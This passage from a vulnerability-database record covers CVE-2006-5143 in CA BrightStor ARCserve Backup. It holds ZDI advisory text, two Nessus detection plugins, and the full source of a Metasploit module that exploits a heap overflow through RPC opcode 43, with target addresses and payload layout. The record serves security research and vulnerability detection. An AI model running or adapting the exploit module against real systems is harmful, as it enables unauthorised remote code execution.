"https://packetstormsecurity.com/files/download/82935/message_engine_heap.rb.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:33", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates BrightStor ARCserve Backup, Enterprise Backup, Server Protection Suite and Business Protection Suite. Authentication is not required to exploit this vulnerability and both client and servers are affected. 
The problem specifically exists within the discovery service which communicates initially over UDP port 41524 and then over TCP port 41523. Due to invalid bounds checking during TCP communications, a stack-based buffer overflow may occur in ASBRDCST.DLL during a call to vsprintf().", "modified": "2006-06-22T00:00:00", "published": "2006-10-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-030/", "id": "ZDI-06-030", "title": "CA BrightStor ARCserve Discovery Service Remote Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates BrightStor ARCserve Backup, Enterprise Backup, Server Protection Suite and Business Protection Suite. Authentication is not required to exploit this vulnerability. The problem specifically exists within ASCORE.dll, a DLL used by the Message Engine RPC server. This service exposes a heap overflow vulnerability through RPC opcode 43 (0x2b) and a stack overflow vulnerability through RPC opcode 45 (0x2d), both reachable on the TCP port 6503 endpoint of the RPC interface with UUID dc246bf0-7a7a-11ce-9f88-00805fe43838. The flaws are exposed when passing long strings as the second parameter to either opcode.", "modified": "2006-06-22T00:00:00", "published": "2006-10-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-031/", "id": "ZDI-06-031", "title": "CA Multiple Product Message Engine RPC Server Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-18T00:43:26", "description": "This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. 
By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n", "published": "2007-02-15T19:08:55", "type": "metasploit", "title": "CA BrightStor ARCserve Message Engine Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/MESSAGE_ENGINE_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve Message Engine Heap Overflow',\n 'Description' => %q{\n This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n 11.5. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-5143' ],\n [ 'OSVDB', '29533' ],\n [ 'BID', '20365' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP4 English', { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],\n ],\n 'DisclosureDate' => 'Oct 05 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6503)\n ])\n end\n\n def exploit\n connect\n\n handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\n print_status(\"Binding to #{handle} ...\")\n\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n # straight forward heap stuffz\n sploit = make_nops(680) + \"\\xeb\\x0a\" + make_nops(2) + [ target.ret 
].pack('V')\n sploit << [ target['UEF'] ].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n begin\n dcerpc_call(43, sploit)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/message_engine_heap.rb"}], "nessus": [{"lastseen": "2021-01-01T01:21:37", "description": "This host is running BrightStor ARCServe DBA server for Windows.\n\nThe remote version of this software is affected by multiple buffer\noverflow vulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.", "edition": 23, "published": "2006-10-06T00:00:00", "title": "CA BrightStor ARCserve Backup DBASVR for Windows Multiple Remote Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "ARCSERVE_WINDOWS_DBASVR_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/nessus/22511", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# BAB r11.5 sp1 and below - QO81201\n# BAB r11.1 - QO82863\n# BAB r11.0 - QI82917\n# BEB r10.5 - QO82858\n# BAB v9.01 - QO82856\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22511);\n script_version (\"1.20\");\n\n script_cve_id(\"CVE-2006-5142\", \"CVE-2006-5143\");\n script_bugtraq_id(20364, 20365);\n\n script_name(english:\"CA BrightStor ARCserve Backup DBASVR for Windows Multiple Remote Buffer Overflows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"This host is running BrightStor ARCServe DBA server for Windows.\n\nThe remote version of this software is affected by multiple buffer\noverflow 
vulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.tippingpoint.com/security/advisories/TSRT-06-11.html\" );\n # https://web.archive.org/web/20061017184949/http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eed70140\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply service pack 2 for Arcserve 11.5 or install the security patch.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve Message Engine Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/10/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/10/05\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Check buffer overflow in BrightStor ARCServe for Windows DBASVR\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n 
script_require_ports (6071);\n\n script_dependencies(\"arcserve_discovery_service_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"ARCSERVE/Discovery/Version\");\n exit(0);\n}\n\n\ninclude ('smb_func.inc');\n\nfunction RPC_Bind ()\n{\n local_var ret, resp, soc;\n\n soc = session_get_socket ();\n\n ret = dce_rpc_bind(cid:session_get_cid(), uuid:\"88435ee0-861a-11ce-b86b-00001b27f656\", vers:1);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n if (!resp)\n return -1;\n\n ret = dce_rpc_parse_bind_ack (data:resp);\n if (isnull (ret) || (ret != 0))\n return -1;\n\n return 0;\n}\n\n\n \nfunction SERGetAgentDisplayName ()\n{\n local_var data, ret, resp, val, soc;\n\n soc = session_get_socket ();\n\n session_set_unicode (unicode:0);\n \n data = \n class_name (name:crap(data:\"A\", length:0x10)) +\n raw_dword(d:100);\n\n session_set_unicode (unicode:1);\n\n ret = dce_rpc_request (code:0x00, data:data);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n resp = dce_rpc_parse_response (data:resp);\n if (strlen(resp) != 20)\n return 0;\n\n val = get_dword (blob:resp, pos:16);\n if (val == 5)\n return 1;\n\n return 0;\n}\n\nver = get_kb_item(\"ARCSERVE/Discovery/Version\");\nif (!ver) exit(0);\n\nmatches = eregmatch(string:ver, pattern:\"^[a-z]([0-9]+)\\.([0-9]+) \\(build ([0-9]+)\\)$\");\nif (isnull(matches)) exit(0);\n\nver = matches[1];\n\n# Exit on version > 12 (safeapi)\nif (int(ver) > 11) exit(0);\n\nport = 6071;\nif ( ! 
get_port_state(port) ) exit(0);\nsoc = open_sock_tcp (port);\nif (!soc) exit (0);\n\nsession_init (socket:soc);\n\nret = RPC_Bind ();\nif (ret != 0)\n exit (0);\n\nret = SERGetAgentDisplayName ();\nif (ret == 1)\n security_hole(port);\n\nclose (soc);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:21:37", "description": "This host is running BrightStor ARCServe for Windows.\n\nThe remote version of this software has multiple buffer overflow\nvulnerabilities. \n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.", "edition": 25, "published": "2006-10-06T00:00:00", "title": "CA BrightStor ARCserve Backup for Windows Multiple Remote Buffer Overflows (QO81201)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5142", "CVE-2006-5143"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:ca:arcserve_backup"], "id": "ARCSERVE_WINDOWS_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/nessus/22510", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22510);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2006-5142\", \"CVE-2006-5143\");\n script_bugtraq_id(20364, 20365);\n\n script_name(english:\"CA BrightStor ARCserve Backup for Windows Multiple Remote Buffer Overflows (QO81201)\");\n script_summary(english:\"Check buffer overflow in BrightStor ARCServe for Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running BrightStor ARCServe for Windows.\n\nThe remote version of this software has multiple buffer overflow\nvulnerabilities. 
\n\nAn attacker, by sending a specially crafted packet, may be able to\nexecute code on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-06-031/\");\n # https://web.archive.org/web/20061017184949/http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eed70140\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply service pack 2 for Arcserve 11.5 or install the security patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve Message Engine Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_require_ports (6503);\n exit(0);\n}\n\n\ninclude ('smb_func.inc');\n\nfunction 
RPC_Bind ()\n{\n local_var ret, resp, soc;\n\n soc = session_get_socket ();\n\n ret = dce_rpc_bind(cid:session_get_cid(), uuid:\"dc246bf0-7a7a-11ce-9f88-00805fe43838\", vers:1);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n if (!resp)\n return -1;\n\n ret = dce_rpc_parse_bind_ack (data:resp);\n if (isnull (ret) || (ret != 0))\n return -1;\n\n return 0;\n}\n\n\nfunction RPC_QSICreateQueue ()\n{\n local_var data, ret, resp, val, soc;\n\n soc = session_get_socket ();\n\n session_set_unicode (unicode:0);\n\n data = \n\tclass_name (name:crap(data:\"A\", length:0x31)) + \n\traw_dword (d:1) +\n\tclass_name (name:\"nessus\");\n\n session_set_unicode (unicode:1);\n\n ret = dce_rpc_request (code:0x01, data:data);\n send (socket:soc, data:ret);\n resp = recv (socket:soc, length:4096);\n\n resp = dce_rpc_parse_response (data:resp);\n if (strlen(resp) != 8)\n return 0;\n\n val = get_dword (blob:resp, pos:4);\n if (val != 3)\n return 1;\n\n return 0;\n}\n\n\n\nport = 6503;\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp (port);\nif (!soc) exit (0);\n\nsession_init (socket:soc);\n\nret = RPC_Bind ();\nif (ret != 0)\n exit (0);\n\nret = RPC_QSICreateQueue ();\nif (ret != 0)\n security_hole(port);\n\nclose (soc);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}